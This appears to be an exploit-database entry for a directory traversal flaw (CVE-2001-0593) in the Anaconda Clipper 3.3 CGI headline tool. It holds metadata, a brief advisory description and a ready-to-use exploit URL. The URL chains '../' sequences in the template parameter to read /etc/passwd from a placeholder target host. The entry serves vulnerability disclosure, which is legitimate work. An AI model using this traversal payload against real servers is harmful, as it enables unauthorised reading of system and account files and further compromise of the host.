anaconda clipper 3.3 - Directory Traversal

Author: UkR hacking team
type: remote
platform: cgi
port: 
date_added: 2001-03-27 
date_updated: 2012-08-22 
verified: 1 
codes: CVE-2001-0593;OSVDB-533 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/2512/info

Clipper is a headline-gathering tool from Anaconda! Partners which, in certain versions, is vulnerable to directory traversal attacks.

By including '/../' sequences in requested URLs, an attacker can cause the retrieval of arbitrary files, compromising the privacy of user data and potentially obtaining information which could be used to further compromise the host's security.

http://www.target.com/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../../../../../../../etc/passwd